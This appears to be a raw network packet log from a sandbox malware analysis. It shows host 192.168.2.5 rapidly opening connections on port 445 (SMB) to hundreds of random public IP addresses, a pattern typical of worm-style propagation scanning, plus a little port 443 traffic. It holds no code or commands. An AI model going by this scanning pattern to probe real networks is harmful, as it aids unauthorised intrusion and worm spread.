                                                        Dec 22, 2022 10:05:42.814634085 CET51749445192.168.2.5126.2.49.14
                                                        Dec 22, 2022 10:05:42.815423012 CET51750445192.168.2.5164.156.152.249
                                                        Dec 22, 2022 10:05:42.817941904 CET51751445192.168.2.5187.67.253.60
                                                        Dec 22, 2022 10:05:42.818006992 CET51752445192.168.2.5167.159.174.157
                                                        Dec 22, 2022 10:05:42.818185091 CET51753445192.168.2.5184.170.251.5
                                                        Dec 22, 2022 10:05:42.818274975 CET51754445192.168.2.567.38.252.47
                                                        Dec 22, 2022 10:05:42.904288054 CET51756445192.168.2.580.235.165.131
                                                        Dec 22, 2022 10:05:42.904460907 CET51757445192.168.2.5151.38.146.2
                                                        Dec 22, 2022 10:05:42.904678106 CET51758445192.168.2.517.39.83.21
                                                        Dec 22, 2022 10:05:43.075665951 CET51669445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:43.091730118 CET51762445192.168.2.526.141.83.252
                                                        Dec 22, 2022 10:05:43.091845036 CET51763445192.168.2.5136.107.201.202
                                                        Dec 22, 2022 10:05:43.169946909 CET51765445192.168.2.59.39.55.132
                                                        Dec 22, 2022 10:05:43.451313972 CET51768445192.168.2.5192.176.4.105
                                                        Dec 22, 2022 10:05:43.607378960 CET51772445192.168.2.541.203.13.37
                                                        Dec 22, 2022 10:05:43.670233965 CET51773445192.168.2.5132.213.51.97
                                                        Dec 22, 2022 10:05:43.670573950 CET51774445192.168.2.5166.55.175.234
                                                        Dec 22, 2022 10:05:43.935508966 CET51778445192.168.2.547.171.12.126
                                                        Dec 22, 2022 10:05:43.935584068 CET51779445192.168.2.555.95.92.122
                                                        Dec 22, 2022 10:05:43.935704947 CET51780445192.168.2.595.196.221.162
                                                        Dec 22, 2022 10:05:43.935883999 CET51782445192.168.2.5156.160.208.113
                                                        Dec 22, 2022 10:05:43.935894966 CET51781445192.168.2.5159.58.183.160
                                                        Dec 22, 2022 10:05:43.936031103 CET51783445192.168.2.5163.92.131.50
                                                        Dec 22, 2022 10:05:43.936134100 CET51785445192.168.2.5135.237.205.241
                                                        Dec 22, 2022 10:05:43.936134100 CET51784445192.168.2.522.31.222.23
                                                        Dec 22, 2022 10:05:43.936194897 CET51786445192.168.2.5137.86.243.96
                                                        Dec 22, 2022 10:05:43.936291933 CET51787445192.168.2.523.227.131.42
                                                        Dec 22, 2022 10:05:43.936310053 CET51788445192.168.2.5171.92.174.221
                                                        Dec 22, 2022 10:05:43.936609030 CET51789445192.168.2.5119.60.83.40
                                                        Dec 22, 2022 10:05:43.936615944 CET51790445192.168.2.5207.58.24.165
                                                        Dec 22, 2022 10:05:43.936616898 CET51791445192.168.2.593.101.208.5
                                                        Dec 22, 2022 10:05:43.939353943 CET51793445192.168.2.5198.212.102.95
                                                        Dec 22, 2022 10:05:43.939353943 CET51792445192.168.2.532.254.155.202
                                                        Dec 22, 2022 10:05:43.939743996 CET51796445192.168.2.5194.240.48.198
                                                        Dec 22, 2022 10:05:43.939753056 CET51794445192.168.2.533.187.87.69
                                                        Dec 22, 2022 10:05:43.939841032 CET51797445192.168.2.5100.198.168.171
                                                        Dec 22, 2022 10:05:43.939876080 CET51795445192.168.2.533.135.239.193
                                                        Dec 22, 2022 10:05:43.939920902 CET51798445192.168.2.568.22.110.17
                                                        Dec 22, 2022 10:05:44.015033007 CET51800445192.168.2.567.64.186.29
                                                        Dec 22, 2022 10:05:44.015537024 CET51801445192.168.2.5211.66.199.155
                                                        Dec 22, 2022 10:05:44.015772104 CET51802445192.168.2.5192.225.43.55
                                                        Dec 22, 2022 10:05:44.201592922 CET51806445192.168.2.5144.197.200.36
                                                        Dec 22, 2022 10:05:44.201859951 CET51807445192.168.2.586.168.102.204
                                                        Dec 22, 2022 10:05:44.278867960 CET51669445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:44.279252052 CET51808445192.168.2.5221.0.187.24
                                                        Dec 22, 2022 10:05:44.564383984 CET51813445192.168.2.5211.249.126.36
                                                        Dec 22, 2022 10:05:44.653975964 CET49678443192.168.2.540.126.32.136
                                                        Dec 22, 2022 10:05:44.685420990 CET51816445192.168.2.541.203.13.38
                                                        Dec 22, 2022 10:05:44.778965950 CET49679443192.168.2.540.126.32.136
                                                        Dec 22, 2022 10:05:44.779014111 CET49680443192.168.2.540.126.32.136
                                                        Dec 22, 2022 10:05:44.780436993 CET51817445192.168.2.5106.63.228.197
                                                        Dec 22, 2022 10:05:44.780574083 CET51818445192.168.2.552.176.229.233
                                                        Dec 22, 2022 10:05:44.875067949 CET4455181641.203.13.38192.168.2.5
                                                        Dec 22, 2022 10:05:45.045469046 CET51822445192.168.2.511.84.214.180
                                                        Dec 22, 2022 10:05:45.045598984 CET51823445192.168.2.5162.168.30.78
                                                        Dec 22, 2022 10:05:45.045911074 CET51824445192.168.2.59.193.241.221
                                                        Dec 22, 2022 10:05:45.046154022 CET51825445192.168.2.5138.61.124.82
                                                        Dec 22, 2022 10:05:45.046272039 CET51826445192.168.2.5129.65.109.207
                                                        Dec 22, 2022 10:05:45.046403885 CET51827445192.168.2.5108.77.94.213
                                                        Dec 22, 2022 10:05:45.046551943 CET51828445192.168.2.592.18.99.171
                                                        Dec 22, 2022 10:05:45.046801090 CET51829445192.168.2.5184.115.146.65
                                                        Dec 22, 2022 10:05:45.047008991 CET51830445192.168.2.591.210.18.86
                                                        Dec 22, 2022 10:05:45.047116995 CET51831445192.168.2.5211.158.104.173
                                                        Dec 22, 2022 10:05:45.047236919 CET51832445192.168.2.524.243.100.180
                                                        Dec 22, 2022 10:05:45.047360897 CET51833445192.168.2.530.20.10.95
                                                        Dec 22, 2022 10:05:45.047475100 CET51834445192.168.2.5172.243.146.21
                                                        Dec 22, 2022 10:05:45.047717094 CET51835445192.168.2.548.172.27.27
                                                        Dec 22, 2022 10:05:45.048537016 CET51836445192.168.2.558.102.41.113
                                                        Dec 22, 2022 10:05:45.051177025 CET51837445192.168.2.542.201.230.42
                                                        Dec 22, 2022 10:05:45.051373005 CET51838445192.168.2.5220.89.244.153
                                                        Dec 22, 2022 10:05:45.051399946 CET51839445192.168.2.5196.218.51.39
                                                        Dec 22, 2022 10:05:45.051456928 CET51840445192.168.2.5185.88.198.138
                                                        Dec 22, 2022 10:05:45.051512003 CET51841445192.168.2.5210.223.232.148
                                                        Dec 22, 2022 10:05:45.051577091 CET51842445192.168.2.5222.73.174.41
                                                        Dec 22, 2022 10:05:45.123130083 CET51845445192.168.2.5103.175.201.24
                                                        Dec 22, 2022 10:05:45.123356104 CET51846445192.168.2.5188.162.213.31
                                                        Dec 22, 2022 10:05:45.123478889 CET51847445192.168.2.5169.37.96.223
                                                        Dec 22, 2022 10:05:45.138350010 CET51658445192.168.2.584.7.167.138
                                                        Dec 22, 2022 10:05:45.185239077 CET51667445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:45.310880899 CET51851445192.168.2.588.250.129.74
                                                        Dec 22, 2022 10:05:45.311057091 CET51852445192.168.2.5149.200.162.67
                                                        Dec 22, 2022 10:05:45.388763905 CET51853445192.168.2.5156.52.40.196
                                                        Dec 22, 2022 10:05:45.389592886 CET51816445192.168.2.541.203.13.38
                                                        Dec 22, 2022 10:05:45.482320070 CET51669445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:45.579374075 CET4455181641.203.13.38192.168.2.5
                                                        Dec 22, 2022 10:05:45.685839891 CET51858445192.168.2.5111.118.52.162
                                                        Dec 22, 2022 10:05:45.748406887 CET51860445192.168.2.541.203.13.39
                                                        Dec 22, 2022 10:05:45.895457029 CET51862445192.168.2.5167.72.245.225
                                                        Dec 22, 2022 10:05:45.942306995 CET4455186041.203.13.39192.168.2.5
                                                        Dec 22, 2022 10:05:46.155251026 CET51867445192.168.2.524.19.67.0
                                                        Dec 22, 2022 10:05:46.155416012 CET51868445192.168.2.5139.244.232.127
                                                        Dec 22, 2022 10:05:46.155662060 CET51869445192.168.2.529.237.238.146
                                                        Dec 22, 2022 10:05:46.155803919 CET51870445192.168.2.5187.4.185.177
                                                        Dec 22, 2022 10:05:46.155921936 CET51871445192.168.2.564.113.102.67
                                                        Dec 22, 2022 10:05:46.156044960 CET51872445192.168.2.5133.139.245.27
                                                        Dec 22, 2022 10:05:46.156290054 CET51873445192.168.2.5118.162.226.237
                                                        Dec 22, 2022 10:05:46.156508923 CET51874445192.168.2.5187.193.68.59
                                                        Dec 22, 2022 10:05:46.156640053 CET51875445192.168.2.596.102.150.76
                                                        Dec 22, 2022 10:05:46.156763077 CET51876445192.168.2.589.63.16.12
                                                        Dec 22, 2022 10:05:46.156922102 CET51877445192.168.2.5217.23.89.4
                                                        Dec 22, 2022 10:05:46.157111883 CET51878445192.168.2.575.74.241.192
                                                        Dec 22, 2022 10:05:46.157250881 CET51879445192.168.2.5154.15.241.95
                                                        Dec 22, 2022 10:05:46.157464981 CET51880445192.168.2.5153.60.251.190
                                                        Dec 22, 2022 10:05:46.158282995 CET51881445192.168.2.557.42.152.128
                                                        Dec 22, 2022 10:05:46.159136057 CET51882445192.168.2.562.103.72.189
                                                        Dec 22, 2022 10:05:46.159945965 CET51883445192.168.2.587.115.46.68
                                                        Dec 22, 2022 10:05:46.160803080 CET51884445192.168.2.564.70.61.117
                                                        Dec 22, 2022 10:05:46.161669016 CET51885445192.168.2.525.245.131.151
                                                        Dec 22, 2022 10:05:46.162522078 CET51886445192.168.2.5158.11.22.118
                                                        Dec 22, 2022 10:05:46.163379908 CET51887445192.168.2.5144.115.7.78
                                                        Dec 22, 2022 10:05:46.232491016 CET51890445192.168.2.5134.241.50.40
                                                        Dec 22, 2022 10:05:46.232604980 CET51891445192.168.2.5109.20.247.211
                                                        Dec 22, 2022 10:05:46.232662916 CET51892445192.168.2.563.30.48.243
                                                        Dec 22, 2022 10:05:46.426112890 CET51896445192.168.2.581.125.7.34
                                                        Dec 22, 2022 10:05:46.426208973 CET51897445192.168.2.5212.220.245.45
                                                        Dec 22, 2022 10:05:46.450949907 CET51860445192.168.2.541.203.13.39
                                                        Dec 22, 2022 10:05:46.514717102 CET51898445192.168.2.5107.70.76.87
                                                        Dec 22, 2022 10:05:46.645032883 CET4455186041.203.13.39192.168.2.5
                                                        Dec 22, 2022 10:05:46.826667070 CET51902445192.168.2.528.107.218.28
                                                        Dec 22, 2022 10:05:46.826951027 CET51904445192.168.2.541.203.13.40
                                                        Dec 22, 2022 10:05:47.012438059 CET4455190441.203.13.40192.168.2.5
                                                        Dec 22, 2022 10:05:47.014290094 CET51907445192.168.2.5209.249.55.212
                                                        Dec 22, 2022 10:05:47.014436007 CET51908445192.168.2.510.4.217.148
                                                        Dec 22, 2022 10:05:47.279756069 CET51913445192.168.2.517.218.172.216
                                                        Dec 22, 2022 10:05:47.279922962 CET51914445192.168.2.567.18.235.203
                                                        Dec 22, 2022 10:05:47.280144930 CET51915445192.168.2.5164.114.220.143
                                                        Dec 22, 2022 10:05:47.280281067 CET51916445192.168.2.5108.177.23.177
                                                        Dec 22, 2022 10:05:47.280395031 CET51917445192.168.2.5150.166.55.52
                                                        Dec 22, 2022 10:05:47.280518055 CET51918445192.168.2.5101.54.229.147
                                                        Dec 22, 2022 10:05:47.280714989 CET51919445192.168.2.547.132.185.121
                                                        Dec 22, 2022 10:05:47.280875921 CET51920445192.168.2.5202.18.198.22
                                                        Dec 22, 2022 10:05:47.281043053 CET51921445192.168.2.5122.165.242.81
                                                        Dec 22, 2022 10:05:47.281187057 CET51922445192.168.2.5182.29.18.103
                                                        Dec 22, 2022 10:05:47.281306028 CET51923445192.168.2.536.47.16.65
                                                        Dec 22, 2022 10:05:47.281452894 CET51924445192.168.2.540.227.223.76
                                                        Dec 22, 2022 10:05:47.281722069 CET51925445192.168.2.5131.164.147.84
                                                        Dec 22, 2022 10:05:47.281888962 CET51926445192.168.2.5138.54.186.72
                                                        Dec 22, 2022 10:05:47.282665014 CET51927445192.168.2.5125.122.59.231
                                                        Dec 22, 2022 10:05:47.283384085 CET51928445192.168.2.569.35.7.85
                                                        Dec 22, 2022 10:05:47.284255028 CET51929445192.168.2.559.89.10.72
                                                        Dec 22, 2022 10:05:47.285006046 CET51930445192.168.2.593.135.235.101
                                                        Dec 22, 2022 10:05:47.285700083 CET51931445192.168.2.571.32.10.76
                                                        Dec 22, 2022 10:05:47.287966013 CET51932445192.168.2.5155.111.217.205
                                                        Dec 22, 2022 10:05:47.300009012 CET51935445192.168.2.5151.242.69.107
                                                        Dec 22, 2022 10:05:47.342221975 CET51936445192.168.2.58.173.118.34
                                                        Dec 22, 2022 10:05:47.342793941 CET51937445192.168.2.5100.8.110.84
                                                        Dec 22, 2022 10:05:47.343082905 CET51938445192.168.2.5214.175.41.19
                                                        Dec 22, 2022 10:05:47.460439920 CET44551921122.165.242.81192.168.2.5
                                                        Dec 22, 2022 10:05:47.513549089 CET51904445192.168.2.541.203.13.40
                                                        Dec 22, 2022 10:05:47.530581951 CET51942445192.168.2.537.229.225.110
                                                        Dec 22, 2022 10:05:47.530751944 CET51943445192.168.2.5107.253.40.199
                                                        Dec 22, 2022 10:05:47.650799990 CET51944445192.168.2.514.192.142.75
                                                        Dec 22, 2022 10:05:47.698935032 CET4455190441.203.13.40192.168.2.5
                                                        Dec 22, 2022 10:05:47.888571978 CET51669445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:47.904448032 CET51948445192.168.2.541.203.13.41
                                                        Dec 22, 2022 10:05:47.953350067 CET51949445192.168.2.5121.63.107.35
                                                        Dec 22, 2022 10:05:47.966737032 CET51921445192.168.2.5122.165.242.81
                                                        Dec 22, 2022 10:05:48.094351053 CET4455194841.203.13.41192.168.2.5
                                                        Dec 22, 2022 10:05:48.123852015 CET51953445192.168.2.582.140.247.59
                                                        Dec 22, 2022 10:05:48.124028921 CET51954445192.168.2.5140.117.153.66
                                                        Dec 22, 2022 10:05:48.145843029 CET44551921122.165.242.81192.168.2.5
                                                        Dec 22, 2022 10:05:48.397212029 CET51960445192.168.2.5137.24.88.25
                                                        Dec 22, 2022 10:05:48.397218943 CET51959445192.168.2.5104.94.102.9
                                                        Dec 22, 2022 10:05:48.397404909 CET51961445192.168.2.581.196.126.54
                                                        Dec 22, 2022 10:05:48.397412062 CET51962445192.168.2.5140.67.202.47
                                                        Dec 22, 2022 10:05:48.397542000 CET51963445192.168.2.596.7.179.57
                                                        Dec 22, 2022 10:05:48.397597075 CET51964445192.168.2.594.210.54.251
                                                        Dec 22, 2022 10:05:48.397650957 CET51965445192.168.2.547.248.247.250
                                                        Dec 22, 2022 10:05:48.397751093 CET51966445192.168.2.5196.214.158.135
                                                        Dec 22, 2022 10:05:48.397972107 CET51968445192.168.2.597.104.124.196
                                                        Dec 22, 2022 10:05:48.397973061 CET51967445192.168.2.523.182.21.77
                                                        Dec 22, 2022 10:05:48.397985935 CET51969445192.168.2.537.92.246.176
                                                        Dec 22, 2022 10:05:48.398142099 CET51970445192.168.2.5163.152.93.202
                                                        Dec 22, 2022 10:05:48.398169994 CET51971445192.168.2.588.228.209.108
                                                        Dec 22, 2022 10:05:48.398240089 CET51972445192.168.2.554.241.62.55
                                                        Dec 22, 2022 10:05:48.400463104 CET51973445192.168.2.529.129.88.123
                                                        Dec 22, 2022 10:05:48.400667906 CET51975445192.168.2.5125.198.192.104
                                                        Dec 22, 2022 10:05:48.400680065 CET51974445192.168.2.571.185.201.118
                                                        Dec 22, 2022 10:05:48.400738001 CET51976445192.168.2.5142.75.10.89
                                                        Dec 22, 2022 10:05:48.400763988 CET51977445192.168.2.5205.213.76.194
                                                        Dec 22, 2022 10:05:48.400830984 CET51978445192.168.2.5138.15.249.147
                                                        Dec 22, 2022 10:05:48.420870066 CET51981445192.168.2.556.229.235.153
                                                        Dec 22, 2022 10:05:48.451781034 CET51982445192.168.2.5100.91.251.100
                                                        Dec 22, 2022 10:05:48.452112913 CET51983445192.168.2.587.204.84.107
                                                        Dec 22, 2022 10:05:48.452290058 CET51984445192.168.2.5215.138.244.166
                                                        Dec 22, 2022 10:05:48.564608097 CET4455196897.104.124.196192.168.2.5
                                                        Dec 22, 2022 10:05:48.572848082 CET4455197254.241.62.55192.168.2.5
                                                        Dec 22, 2022 10:05:48.607414961 CET51948445192.168.2.541.203.13.41
                                                        Dec 22, 2022 10:05:48.638935089 CET51987445192.168.2.5183.50.167.138
                                                        Dec 22, 2022 10:05:48.638935089 CET51988445192.168.2.5101.254.53.243
                                                        Dec 22, 2022 10:05:48.769056082 CET51991445192.168.2.580.78.201.12
                                                        Dec 22, 2022 10:05:48.797393084 CET4455194841.203.13.41192.168.2.5
                                                        Dec 22, 2022 10:05:48.998357058 CET51994445192.168.2.541.203.13.42
                                                        Dec 22, 2022 10:05:49.076186895 CET51972445192.168.2.554.241.62.55
                                                        Dec 22, 2022 10:05:49.076338053 CET51968445192.168.2.597.104.124.196
                                                        Dec 22, 2022 10:05:49.076637030 CET51995445192.168.2.586.210.197.101
                                                        Dec 22, 2022 10:05:49.192017078 CET4455199441.203.13.42192.168.2.5
                                                        Dec 22, 2022 10:05:49.233146906 CET52000445192.168.2.5152.10.102.253
                                                        Dec 22, 2022 10:05:49.233408928 CET52001445192.168.2.518.178.3.6
                                                        Dec 22, 2022 10:05:49.242932081 CET4455196897.104.124.196192.168.2.5
                                                        Dec 22, 2022 10:05:49.250819921 CET4455197254.241.62.55192.168.2.5
                                                        Dec 22, 2022 10:05:49.498608112 CET52005445192.168.2.566.83.86.176
                                                        Dec 22, 2022 10:05:49.498831034 CET52008445192.168.2.5187.65.240.71
                                                        Dec 22, 2022 10:05:49.498842001 CET52007445192.168.2.565.37.168.204
                                                        Dec 22, 2022 10:05:49.499229908 CET52011445192.168.2.587.184.211.163
                                                        Dec 22, 2022 10:05:49.499231100 CET52010445192.168.2.5201.17.254.43
                                                        Dec 22, 2022 10:05:49.499249935 CET52012445192.168.2.5192.18.42.87
                                                        Dec 22, 2022 10:05:49.499387980 CET52014445192.168.2.56.241.4.226
                                                        Dec 22, 2022 10:05:49.499459982 CET52009445192.168.2.510.151.87.153
                                                        Dec 22, 2022 10:05:49.499464035 CET52013445192.168.2.532.73.123.205
                                                        Dec 22, 2022 10:05:49.499532938 CET52015445192.168.2.5182.76.196.26
                                                        Dec 22, 2022 10:05:49.499617100 CET52016445192.168.2.5177.128.143.161
                                                        Dec 22, 2022 10:05:49.499752045 CET52017445192.168.2.5189.246.160.66
                                                        Dec 22, 2022 10:05:49.499819994 CET52018445192.168.2.588.80.61.118
                                                        Dec 22, 2022 10:05:49.499917984 CET52019445192.168.2.5106.25.9.38
                                                        Dec 22, 2022 10:05:49.502439022 CET52020445192.168.2.5205.151.22.43
                                                        Dec 22, 2022 10:05:49.502556086 CET52021445192.168.2.5136.229.6.118
                                                        Dec 22, 2022 10:05:49.502715111 CET52022445192.168.2.5114.247.239.159
                                                        Dec 22, 2022 10:05:49.502810001 CET52023445192.168.2.5124.64.49.184
                                                        Dec 22, 2022 10:05:49.502852917 CET52024445192.168.2.576.218.158.154
                                                        Dec 22, 2022 10:05:49.502926111 CET52025445192.168.2.51.81.251.108
                                                        Dec 22, 2022 10:05:49.530498028 CET52028445192.168.2.5213.229.190.14
                                                        Dec 22, 2022 10:05:49.577420950 CET52029445192.168.2.545.231.53.195
                                                        Dec 22, 2022 10:05:49.577500105 CET52030445192.168.2.58.241.231.6
                                                        Dec 22, 2022 10:05:49.577730894 CET52031445192.168.2.570.115.113.11
                                                        Dec 22, 2022 10:05:49.696053982 CET51994445192.168.2.541.203.13.42
                                                        Dec 22, 2022 10:05:49.748567104 CET52034445192.168.2.546.14.231.192
                                                        Dec 22, 2022 10:05:49.748743057 CET52035445192.168.2.577.227.160.237
                                                        Dec 22, 2022 10:05:49.874200106 CET52038445192.168.2.5199.115.40.53
                                                        Dec 22, 2022 10:05:49.889632940 CET4455199441.203.13.42192.168.2.5
                                                        Dec 22, 2022 10:05:49.951337099 CET51658445192.168.2.584.7.167.138
                                                        Dec 22, 2022 10:05:49.998238087 CET51667445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:50.061173916 CET52040445192.168.2.541.203.13.43
                                                        Dec 22, 2022 10:05:50.201873064 CET52043445192.168.2.546.35.223.75
                                                        Dec 22, 2022 10:05:50.255338907 CET4455204041.203.13.43192.168.2.5
                                                        Dec 22, 2022 10:05:50.358521938 CET52047445192.168.2.576.167.181.1
                                                        Dec 22, 2022 10:05:50.358582020 CET52048445192.168.2.569.244.13.97
                                                        Dec 22, 2022 10:05:50.623641968 CET52052445192.168.2.5112.128.222.91
                                                        Dec 22, 2022 10:05:50.624056101 CET52054445192.168.2.5118.104.64.113
                                                        Dec 22, 2022 10:05:50.624145031 CET52055445192.168.2.538.71.22.178
                                                        Dec 22, 2022 10:05:50.624245882 CET52056445192.168.2.5112.41.160.199
                                                        Dec 22, 2022 10:05:50.624332905 CET52057445192.168.2.5139.182.58.15
                                                        Dec 22, 2022 10:05:50.624432087 CET52058445192.168.2.583.135.14.132
                                                        Dec 22, 2022 10:05:50.624516010 CET52059445192.168.2.5116.163.146.173
                                                        Dec 22, 2022 10:05:50.624604940 CET52060445192.168.2.5100.244.54.15
                                                        Dec 22, 2022 10:05:50.624701023 CET52061445192.168.2.587.139.144.233
                                                        Dec 22, 2022 10:05:50.624921083 CET52062445192.168.2.577.23.62.194
                                                        Dec 22, 2022 10:05:50.625180006 CET52063445192.168.2.590.212.115.206
                                                        Dec 22, 2022 10:05:50.625181913 CET52064445192.168.2.512.88.30.245
                                                        Dec 22, 2022 10:05:50.625272036 CET52065445192.168.2.5126.30.63.113
                                                        Dec 22, 2022 10:05:50.625368118 CET52066445192.168.2.523.96.36.225
                                                        Dec 22, 2022 10:05:50.625974894 CET52067445192.168.2.5124.163.83.177
                                                        Dec 22, 2022 10:05:50.626471043 CET52068445192.168.2.5140.176.50.82
                                                        Dec 22, 2022 10:05:50.627163887 CET52069445192.168.2.5197.132.141.241
                                                        Dec 22, 2022 10:05:50.628432035 CET52070445192.168.2.545.41.122.173
                                                        Dec 22, 2022 10:05:50.628504038 CET52071445192.168.2.591.72.61.190
                                                        Dec 22, 2022 10:05:50.628616095 CET52072445192.168.2.534.204.35.123
                                                        Dec 22, 2022 10:05:50.655632973 CET52074445192.168.2.5200.152.196.114
                                                        Dec 22, 2022 10:05:50.701586962 CET52076445192.168.2.576.94.82.137
                                                        Dec 22, 2022 10:05:50.701694965 CET52077445192.168.2.544.249.215.181
                                                        Dec 22, 2022 10:05:50.701698065 CET52078445192.168.2.5117.29.37.203
                                                        Dec 22, 2022 10:05:50.763818979 CET52040445192.168.2.541.203.13.43
                                                        Dec 22, 2022 10:05:50.873702049 CET52081445192.168.2.5210.195.84.138
                                                        Dec 22, 2022 10:05:50.873965979 CET52082445192.168.2.5207.109.202.87
                                                        Dec 22, 2022 10:05:50.958076954 CET4455204041.203.13.43192.168.2.5
                                                        Dec 22, 2022 10:05:50.999022961 CET52085445192.168.2.5179.183.39.187
                                                        Dec 22, 2022 10:05:51.139166117 CET52087445192.168.2.541.203.13.44
                                                        Dec 22, 2022 10:05:51.327083111 CET52091445192.168.2.526.17.161.5
                                                        Dec 22, 2022 10:05:51.328430891 CET4455208741.203.13.44192.168.2.5
                                                        Dec 22, 2022 10:05:51.467216015 CET52095445192.168.2.511.211.49.110
                                                        Dec 22, 2022 10:05:51.467284918 CET52096445192.168.2.556.231.233.67
                                                        Dec 22, 2022 10:05:51.733174086 CET52101445192.168.2.5114.244.105.0
                                                        Dec 22, 2022 10:05:51.733194113 CET52100445192.168.2.5120.127.205.178
                                                        Dec 22, 2022 10:05:51.733424902 CET52103445192.168.2.5217.160.121.15
                                                        Dec 22, 2022 10:05:51.733540058 CET52104445192.168.2.541.207.241.32
                                                        Dec 22, 2022 10:05:51.733668089 CET52105445192.168.2.5117.167.21.97
                                                        Dec 22, 2022 10:05:51.733732939 CET52106445192.168.2.514.169.104.123
                                                        Dec 22, 2022 10:05:51.733800888 CET52107445192.168.2.595.146.210.243
                                                        Dec 22, 2022 10:05:51.733920097 CET52108445192.168.2.5214.254.99.94
                                                        Dec 22, 2022 10:05:51.733944893 CET52109445192.168.2.5134.98.167.245
                                                        Dec 22, 2022 10:05:51.734097004 CET52111445192.168.2.51.185.35.170
                                                        Dec 22, 2022 10:05:51.734114885 CET52110445192.168.2.593.242.60.73
                                                        Dec 22, 2022 10:05:51.734241009 CET52112445192.168.2.526.132.72.244
                                                        Dec 22, 2022 10:05:51.734400988 CET52113445192.168.2.5174.25.95.225
                                                        Dec 22, 2022 10:05:51.734462976 CET52114445192.168.2.581.8.162.166
                                                        Dec 22, 2022 10:05:51.737109900 CET52115445192.168.2.587.243.6.229
                                                        Dec 22, 2022 10:05:51.737147093 CET52116445192.168.2.591.202.62.56
                                                        Dec 22, 2022 10:05:51.737282991 CET52117445192.168.2.5110.164.249.189
                                                        Dec 22, 2022 10:05:51.737320900 CET52118445192.168.2.5187.123.178.157
                                                        Dec 22, 2022 10:05:51.737400055 CET52119445192.168.2.5188.69.254.139
                                                        Dec 22, 2022 10:05:51.737417936 CET52120445192.168.2.5118.21.196.43
                                                        Dec 22, 2022 10:05:51.765186071 CET52122445192.168.2.551.145.14.115
                                                        Dec 22, 2022 10:05:51.811218977 CET52125445192.168.2.516.183.58.150
                                                        Dec 22, 2022 10:05:51.811218977 CET52124445192.168.2.5168.200.44.211
                                                        Dec 22, 2022 10:05:51.811310053 CET52126445192.168.2.528.230.106.219
                                                        Dec 22, 2022 10:05:51.842031956 CET52087445192.168.2.541.203.13.44
                                                        Dec 22, 2022 10:05:51.998857975 CET52130445192.168.2.5203.40.39.207
                                                        Dec 22, 2022 10:05:51.999110937 CET52131445192.168.2.5183.128.37.171
                                                        Dec 22, 2022 10:05:52.031322956 CET4455208741.203.13.44192.168.2.5
                                                        Dec 22, 2022 10:05:52.092091084 CET49685443192.168.2.513.107.42.16
                                                        Dec 22, 2022 10:05:52.111959934 CET52133445192.168.2.5207.52.5.36
                                                        Dec 22, 2022 10:05:52.149866104 CET52134443192.168.2.520.90.152.133
                                                        Dec 22, 2022 10:05:52.149924040 CET4435213420.90.152.133192.168.2.5
                                                        Dec 22, 2022 10:05:52.150073051 CET52134443192.168.2.520.90.152.133
                                                        Dec 22, 2022 10:05:52.151062012 CET52134443192.168.2.520.90.152.133
                                                        Dec 22, 2022 10:05:52.151094913 CET4435213420.90.152.133192.168.2.5
                                                        Dec 22, 2022 10:05:52.202085018 CET52135445192.168.2.541.203.13.45
                                                        Dec 22, 2022 10:05:52.251475096 CET4435213420.90.152.133192.168.2.5
                                                        Dec 22, 2022 10:05:52.251679897 CET52134443192.168.2.520.90.152.133
                                                        Dec 22, 2022 10:05:52.256328106 CET52134443192.168.2.520.90.152.133
                                                        Dec 22, 2022 10:05:52.256356955 CET4435213420.90.152.133192.168.2.5
                                                        Dec 22, 2022 10:05:52.256795883 CET4435213420.90.152.133192.168.2.5
                                                        Dec 22, 2022 10:05:52.258088112 CET52134443192.168.2.520.90.152.133
                                                        Dec 22, 2022 10:05:52.258112907 CET4435213420.90.152.133192.168.2.5
                                                        Dec 22, 2022 10:05:52.258150101 CET52134443192.168.2.520.90.152.133
                                                        Dec 22, 2022 10:05:52.258158922 CET4435213420.90.152.133192.168.2.5
                                                        Dec 22, 2022 10:05:52.258337021 CET52134443192.168.2.520.90.152.133
                                                        Dec 22, 2022 10:05:52.258352995 CET4435213420.90.152.133192.168.2.5
                                                        Dec 22, 2022 10:05:52.288420916 CET4435213420.90.152.133192.168.2.5
                                                        Dec 22, 2022 10:05:52.288512945 CET4435213420.90.152.133192.168.2.5
                                                        Dec 22, 2022 10:05:52.288600922 CET52134443192.168.2.520.90.152.133
                                                        Dec 22, 2022 10:05:52.288770914 CET52134443192.168.2.520.90.152.133
                                                        Dec 22, 2022 10:05:52.288784981 CET4435213420.90.152.133192.168.2.5
                                                        Dec 22, 2022 10:05:52.395920038 CET4455213541.203.13.45192.168.2.5
                                                        Dec 22, 2022 10:05:52.436650038 CET52139445192.168.2.5120.72.166.253
                                                        Dec 22, 2022 10:05:52.576834917 CET52144445192.168.2.5167.41.46.44
                                                        Dec 22, 2022 10:05:52.576914072 CET52145445192.168.2.5180.148.109.177
                                                        Dec 22, 2022 10:05:52.701597929 CET51669445192.168.2.584.7.167.1
                                                        Dec 22, 2022 10:05:52.858869076 CET52149445192.168.2.5165.62.158.23
                                                        Dec 22, 2022 10:05:52.859097958 CET52150445192.168.2.5173.32.67.93
                                                        Dec 22, 2022 10:05:52.859464884 CET52152445192.168.2.5219.65.133.109
                                                        Dec 22, 2022 10:05:52.859642982 CET52153445192.168.2.5162.85.200.11
                                                        Dec 22, 2022 10:05:52.859770060 CET52154445192.168.2.5171.64.105.21
                                                        Dec 22, 2022 10:05:52.859915972 CET52155445192.168.2.561.127.198.228
                                                        Dec 22, 2022 10:05:52.860136032 CET52156445192.168.2.5160.221.28.252
                                                        Dec 22, 2022 10:05:52.860275984 CET52157445192.168.2.550.154.161.31
                                                        Dec 22, 2022 10:05:52.860485077 CET52158445192.168.2.5143.176.102.192
                                                        Dec 22, 2022 10:05:52.860626936 CET52159445192.168.2.510.43.208.39
                                                        Dec 22, 2022 10:05:52.860750914 CET52160445192.168.2.5152.83.174.245
                                                        Dec 22, 2022 10:05:52.860892057 CET52161445192.168.2.5159.182.6.101
                                                        Dec 22, 2022 10:05:52.861012936 CET52162445192.168.2.5179.91.158.27
                                                        Dec 22, 2022 10:05:52.861154079 CET52163445192.168.2.5213.181.110.101
                                                        Dec 22, 2022 10:05:52.863195896 CET52164445192.168.2.5103.8.55.183
                                                        Dec 22, 2022 10:05:52.871949911 CET52165445192.168.2.53.161.15.133
